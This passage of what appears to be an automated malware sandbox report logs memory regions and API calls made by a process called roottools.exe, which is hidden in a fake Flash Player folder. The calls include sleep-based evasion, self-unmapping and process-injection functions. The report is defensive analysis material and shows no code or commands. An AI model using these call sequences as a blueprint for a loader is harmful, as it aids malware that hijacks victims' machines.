lpk.dll 0x768f0000 0x768f9fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76950000 0x769dffff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76a70000 0x776b9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x777e0000 0x77814fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000778b0000 0x778b0000 0x779a9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000779b0000 0x779b0000 0x77acefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77ad0000 0x77c78fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77cb0000 0x77e2ffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Threads
Thread 0x6a8
(Host: 634, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x759d5235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x762170a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x761c3dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x761c07b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x761e1ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x761c8e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x761c7684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x761ccc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x761f903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x761c6231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x761c5fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x761d3f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x761d4e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x761fdb72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x761e2a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x761fd737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x761fe015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x761fcc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x761fd1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x761fd48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x761fd4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x761fd509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x761ce7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x761ce496 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x761cddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x761fd53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76202055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x762020ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76202151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x762021f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76202288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76202335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x762023d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x761d5934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x761d5a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x761d59b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7622e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x7622ef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7622f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x7622ef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7622f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7622dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7622ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x7622ea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7622d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7622ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x7622ca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x7622cc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x7622cde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7622c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7622ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x7622d155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x761cb0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x761e5f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x761d4fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x761d0d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x761e59ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x761bf8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75b29d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75af0782 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x74010000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74057685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x758d7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x758e3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x758fe7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x758e5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x758e451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x758e4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 4923548 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Langskallet7, wndproc_parameter = 0 True 1
Fn
Module Load module_name = KERNEL32 , base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x759ecfcc True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a50efd True 1
Fn
Module Load module_name = shell32, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76cb8af2 True 1
Fn
Module Load module_name = NTDLL, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x77ccfb18 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Load module_name = user32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x758e0a19 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Load module_name = ntdll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x77ccff2c True 1
Fn
System Sleep duration = 15 milliseconds (0.015 seconds) True 32
Fn
System Sleep duration = 8000 milliseconds (8.000 seconds) True 1
Fn
Module Load module_name = ntdll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77cd0028 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x759d53c6 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x759d196e True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x759d1826 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a545bf True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a5437f True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x759ed802 True 1
Fn
Module Load module_name = IPHlpApi, base_address = 0x756d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x756d9263 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Load module_name = shell32, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76cb7078 True 1
Fn
Module Load module_name = User32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x758dd1cf True 1
Fn
Module Load module_name = user32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = user32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x758e3961 True 1
Fn
Module Unmap process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 True 1
